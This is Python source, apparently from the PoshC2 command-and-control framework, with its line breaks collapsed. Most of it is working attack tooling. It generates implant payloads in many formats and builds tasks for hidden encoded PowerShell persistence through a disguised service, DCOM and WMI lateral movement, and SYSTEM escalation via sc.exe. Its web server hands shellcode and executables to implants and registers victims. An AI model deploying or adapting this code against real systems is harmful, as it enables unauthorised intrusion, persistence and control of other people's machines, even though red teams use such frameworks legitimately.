def do_createnewpayload(user, command, creds=None): params = re.compile("createnewpayload ", re.IGNORECASE) params = params.sub("", command) creds = None if "-credid" in params: creds, params = get_creds_from_params(params, user) if creds is None: return if not creds['Password']: print_bad("This command does not support credentials with hashes") input("Press Enter to continue...") clear() return domain = input("Domain or URL: https://www.example.com ") domainbase = (domain.lower()).replace('https://', '') domainbase = domainbase.replace('http://', '') domainfront = input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ") proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ") randomid = randomuri(5) proxyuser = "" proxypass = "" credsexpire = "" if proxyurl: if creds is not None: proxyuser = "******" % (creds['Domain'], creds['Username']) proxypass = creds['Password'] else: proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ") proxypass = input("Proxy Password: e.g. Password1 ") credsexpire = input( Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ") imurl = "%s?p" % get_newimplanturl() domainbase = "Proxy%s%s" % (domainbase, randomid) else: domainbase = "%s%s" % (randomid, domainbase) imurl = get_newimplanturl() C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser, proxypass, proxyurl, "", "", C2[19], C2[20], C2[21], imurl, PayloadsDirectory) newPayload.CreateRaw("%s_" % domainbase) newPayload.CreateDlls("%s_" % domainbase) newPayload.CreateShellcode("%s_" % domainbase) newPayload.CreateEXE("%s_" % domainbase) newPayload.CreateMsbuild("%s_" % domainbase) newPayload.CreatePython("%s_" % domainbase) newPayload.CreateCS("%s_" % domainbase) new_urldetails(randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire) print_good("Created new payloads") input("Press Enter to continue...") clear()
def do_createdaisypayload(user, command): name = input(Colours.GREEN + "Daisy name: e.g. DC1 ") domain = input("Domain or URL: https://www.example.com ") daisyurl = input("Daisy host: .e.g. http://10.150.10.1 ") if (daisyurl == "http://127.0.0.1"): daisyurl = "http://localhost" if (daisyurl == "https://127.0.0.1"): daisyurl = "https://localhost" daisyport = input("Daisy port: .e.g. 8888 ") daisyhostid = input("Select Daisy Implant Host: e.g. 5 ") daisyhost = get_implantbyid(daisyhostid) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "", "", proxynone, C2[19], C2[20], C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory) newPayload.PSDropper = (newPayload.PSDropper).replace( "$pid;%s" % (daisyurl + ":" + daisyport), "$pid;%s@%s" % (daisyhost[11], daisyhost[3])) newPayload.CreateRaw(name) newPayload.CreateDlls(name) newPayload.CreateShellcode(name) newPayload.CreateEXE(name) newPayload.CreateMsbuild(name) newPayload.CreateCS(name) new_urldetails(name, C2[1], C2[3], domain, daisyurl, daisyhostid, "") print_good("Created new %s daisy payloads" % name) input("Press Enter to continue...") clear()
def do_install_servicelevel_persistencewith(user, command, randomuri): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % ( payload) new_task(cmd, user, randomuri)
def do_invoke_dcompayload(user, command, randomuri): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % ( target, payload) new_task(pscommand, user, randomuri)
def do_invoke_wmipayload(user, command, randomuri): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() params = re.compile("invoke-wmipayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % ( params, payload) new_task(cmd, user, randomuri)
def do_get_system(user, command, randomuri): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, user, randomuri)
def do_get_system_withproxy(user, command, randomuri): C2 = get_c2server_all() if C2[11] == "": print_bad("Need to run createproxypayload first") return else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, user, randomuri)
def do_invoke_runasproxypayload(user, command, randomuri): C2 = get_c2server_all() if C2[11] == "": print_bad("Need to run createproxypayload first") return else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload new_task(proxyvar, user, randomuri) check_module_loaded("Invoke-RunAs.ps1", randomuri, user) check_module_loaded("NamedPipeProxy.ps1", randomuri, user) params = re.compile("invoke-runasproxypayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % ( params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8")) new_task(pscommand, user, randomuri)
def do_createproxypayload(user, command, creds=None): params = re.compile("createproxypayload ", re.IGNORECASE) params = params.sub("", command) creds = None if "-credid" in params: creds, params = get_creds_from_params(params, user) if creds is None: return if not creds['Password']: print_bad("This command does not support credentials with hashes") input("Press Enter to continue...") clear() return if creds is not None: proxyuser = "******" % (creds['Domain'], creds['Username']) proxypass = creds['Password'] else: proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ") proxypass = input("Proxy Password: e.g. Password1 ") proxyurl = input(Colours.GREEN + "Proxy URL: .e.g. http://10.150.10.1:8080 ") credsexpire = input("Password/Account Expiration Date: .e.g. 15/03/2018 ") update_item("ProxyURL", "C2Server", proxyurl) update_item("ProxyUser", "C2Server", proxyuser) update_item("ProxyPass", "C2Server", proxypass) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) newPayload.CreateRaw("Proxy") newPayload.CreateDlls("Proxy") newPayload.CreateShellcode("Proxy") newPayload.CreateEXE("Proxy") newPayload.CreateMsbuild("Proxy") newPayload.CreateCS("Proxy") new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire) print_good("Created new proxy payloads") input("Press Enter to continue...") clear()
def do_GET(self): """Respond to a GET request.""" logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers)) new_implant_url = get_newimplanturl() self.cookieHeader = self.headers.get('Cookie') QuickCommandURI = select_item("QuickCommand", "C2Server") UriPath = str(self.path) sharpurls = get_sharpurls().split(",") sharplist = [] for i in sharpurls: i = i.replace(" ", "") i = i.replace("\"", "") sharplist.append("/" + i) self.server_version = ServerHeader self.sys_version = "" if not self.cookieHeader: self.cookieHeader = "NONE" # implant gets a new task new_task = newTask(self.path) if new_task: self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(new_task) elif [ele for ele in sharplist if(ele in UriPath)]: try: open("%swebserver.log" % PoshProjectDirectory, "a").write("%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (self.address_string(), self.log_date_time_string(), SocksHost, UriPath)) r = Request("%s%s" % (SocksHost, UriPath), headers={'Accept-Encoding': 'gzip', 'Cookie': '%s' % self.cookieHeader, 'User-Agent': UserAgent}) res = urlopen(r) sharpout = res.read() self.send_response(200) self.send_header("Content-type", "text/html") self.send_header("Connection", "close") self.send_header("Content-Length", len(sharpout)) self.end_headers() if (len(sharpout) > 0): self.wfile.write(sharpout) except HTTPError as e: self.send_response(e.code) self.send_header("Content-type", "text/html") self.send_header("Connection", "close") self.end_headers() open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e) except Exception as e: open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e) print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END) print(Colours.RED + UriPath + Colours.END) self.send_response(404) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(bytes(HTTPResponse, "utf-8")) elif ("%s_bs" % QuickCommandURI) in self.path: filename = "%spayload.bat" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%s_rg" % QuickCommandURI) in self.path: filename = "%srg_sct.xml" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%ss/86/portal" % QuickCommandURI) in self.path: filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%ss/64/portal" % QuickCommandURI) in self.path: filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%sp/86/portal" % QuickCommandURI) in self.path: filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%sp/64/portal" % QuickCommandURI) in self.path: filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%s_cs" % QuickCommandURI) in self.path: filename = "%scs_sct.xml" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%s_py" % QuickCommandURI) in self.path: filename = "%saes.py" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = "a" + "".join("{:02x}".format(c) for c in content) self.send_response(200) self.send_header("Content-type", "text/plain") self.end_headers() self.wfile.write(bytes(content, "utf-8")) elif ("%s_ex86" % QuickCommandURI) in self.path: filename = "%sPosh32.exe" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() self.send_response(200) self.send_header("Content-type", "application/x-msdownload") self.end_headers() self.wfile.write(content) elif ("%s_ex64" % QuickCommandURI) in self.path: filename = "%sPosh64.exe" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() self.send_response(200) self.send_header("Content-type", "application/x-msdownload") self.end_headers() self.wfile.write(content) # register new implant elif new_implant_url in self.path and self.cookieHeader.startswith("SessionID"): implant_type = "PS" if self.path == ("%s?p" % new_implant_url): implant_type = "PS Proxy" if self.path == ("%s?d" % new_implant_url): implant_type = "PS Daisy" if self.path == ("%s?m" % new_implant_url): implant_type = "Python" if self.path == ("%s?d?m" % new_implant_url): implant_type = "Python Daisy" if self.path == ("%s?p?m" % new_implant_url): implant_type = "Python Proxy" if self.path == ("%s?c" % new_implant_url): implant_type = "C#" if self.path == ("%s?d?c" % new_implant_url): implant_type = "C# Daisy" if self.path == ("%s?p?c" % new_implant_url): implant_type = "C# Proxy" if implant_type.startswith("C#"): cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";") Proxy = Proxy.replace("\x00", "") if "\\" in User: User = User[User.index("\\") + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.save() newImplant.display() newImplant.autoruns() responseVal = encrypt(KEY, newImplant.SharpCore) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(responseVal) elif implant_type.startswith("Python"): cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(";") Proxy = Proxy.replace("\x00", "") newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.save() newImplant.display() responseVal = encrypt(KEY, newImplant.PythonCore) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(responseVal) else: try: cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY.encode("utf-8"), cookieVal) decCookie = str(decCookie) Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";") Proxy = Proxy.replace("\x00", "") IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) if "\\" in str(User): User = User[str(User).index('\\') + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.save() newImplant.display() newImplant.autoruns() responseVal = encrypt(KEY, newImplant.PSCore) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(responseVal) except Exception as e: print("Decryption error: %s" % e) traceback.print_exc() self.send_response(404) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(bytes(HTTPResponse, "utf-8")) else: self.send_response(404) self.send_header("Content-type", "text/html") self.end_headers() HTTPResponsePage = select_item("HTTPResponse", "C2Server") if HTTPResponsePage: self.wfile.write(bytes(HTTPResponsePage, "utf-8")) else: self.wfile.write(bytes(HTTPResponse, "utf-8"))
def main(args): httpd = ThreadedHTTPServer((BindIP, BindPort), MyHandler) try: if os.name == 'nt': os.system('cls') else: os.system('clear') except Exception: print("cls") print(chr(27) + "[2J") print(Colours.GREEN + logopic) print(Colours.END + "") if os.path.isfile(Database): print("Using existing database / project" + Colours.GREEN) C2 = get_c2server_all() if ((C2[1] == PayloadCommsHost) and (C2[3] == DomainFrontHeader)): qstart = "%squickstart.txt" % (PoshProjectDirectory) if os.path.exists(qstart): with open(qstart, 'r') as f: print(f.read()) else: print("Error: different IP so regenerating payloads") if os.path.exists("%spayloads_old" % PoshProjectDirectory): import shutil shutil.rmtree("%spayloads_old" % PoshProjectDirectory) os.rename(PayloadsDirectory, "%s:_old" % PoshProjectDirectory) os.makedirs(PayloadsDirectory) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], PayloadCommsHost, DomainFrontHeader, C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) new_urldetails("updated_host", PayloadCommsHost, C2[3], "", "", "", "") update_item("PayloadCommsHost", "C2Server", PayloadCommsHost) update_item("QuickCommand", "C2Server", QuickCommand) update_item("DomainFrontHeader", "C2Server", DomainFrontHeader) newPayload.CreateRaw() newPayload.CreateDlls() newPayload.CreateShellcode() newPayload.CreateSCT() newPayload.CreateHTA() newPayload.CreateCS() newPayload.CreateMacro() newPayload.CreateEXE() newPayload.CreateMsbuild() newPayload.CreatePython() newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt') else: print("Initializing new project folder and database" + Colours.GREEN) print("") directory = os.path.dirname(PoshProjectDirectory) if not os.path.exists(PoshProjectDirectory): os.makedirs(PoshProjectDirectory) if not os.path.exists(DownloadsDirectory): os.makedirs(DownloadsDirectory) if not os.path.exists(ReportsDirectory): os.makedirs(ReportsDirectory) if not os.path.exists(PayloadsDirectory): os.makedirs(PayloadsDirectory) initializedb() if not validate_sleep_time(DefaultSleep): print(Colours.RED) print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h") print(Colours.GREEN) sys.exit(1) setupserver(PayloadCommsHost, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, HTTPResponse, PoshProjectDirectory, PayloadCommsPort, QuickCommand, DownloadURI, "", "", "", Sounds, ClockworkSMS_APIKEY, ClockworkSMS_MobileNumbers, URLS, SocksURLS, Insecure, UserAgent, Referrer, Pushover_APIToken, Pushover_APIUser, EnableNotifications) rewriteFile = "%s/rewrite-rules.txt" % directory print("Creating Rewrite Rules in: " + rewriteFile) print("") rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1"] rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules() with open(rewriteFile, 'w') as outFile: for line in rewriteFileContents: outFile.write(line) outFile.write('\n') outFile.close() C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) new_urldetails("default", C2[1], C2[3], "", "", "", "") newPayload.CreateRaw() newPayload.CreateDlls() newPayload.CreateShellcode() newPayload.CreateSCT() newPayload.CreateHTA() newPayload.CreateCS() newPayload.CreateMacro() newPayload.CreateEXE() newPayload.CreateMsbuild() create_self_signed_cert(PoshProjectDirectory) newPayload.CreatePython() newPayload.WriteQuickstart(directory + '/quickstart.txt') print("") print("CONNECT URL: " + select_item("PayloadCommsHost", "C2Server") + get_newimplanturl() + Colours.GREEN) print("WEBSERVER Log: %swebserver.log" % PoshProjectDirectory) global KEY KEY = get_baseenckey() print("") print(time.asctime() + " PoshC2 Server Started - %s:%s" % (BindIP, BindPort)) from datetime import date, datetime killdate = datetime.strptime(C2[5], '%d/%m/%Y').date() datedifference = number_of_days(date.today(), killdate) if datedifference < 8: print (Colours.RED+("\nKill Date is - %s - expires in %s days" % (C2[5],datedifference))) else: print (Colours.GREEN+("\nKill Date is - %s - expires in %s days" % (C2[5],datedifference))) print(Colours.END) protocol = urlparse(PayloadCommsHost).scheme if protocol == 'https': if (os.path.isfile("%sposh.crt" % PoshProjectDirectory)) and (os.path.isfile("%sposh.key" % PoshProjectDirectory)): try: httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLS) except Exception: httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1) else: raise ValueError("Cannot find the certificate files") c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True) c2_message_thread.start() try: httpd.serve_forever() except (KeyboardInterrupt, EOFError): httpd.server_close() print(time.asctime() + " PoshC2 Server Stopped - %s:%s" % (BindIP, BindPort)) sys.exit(0)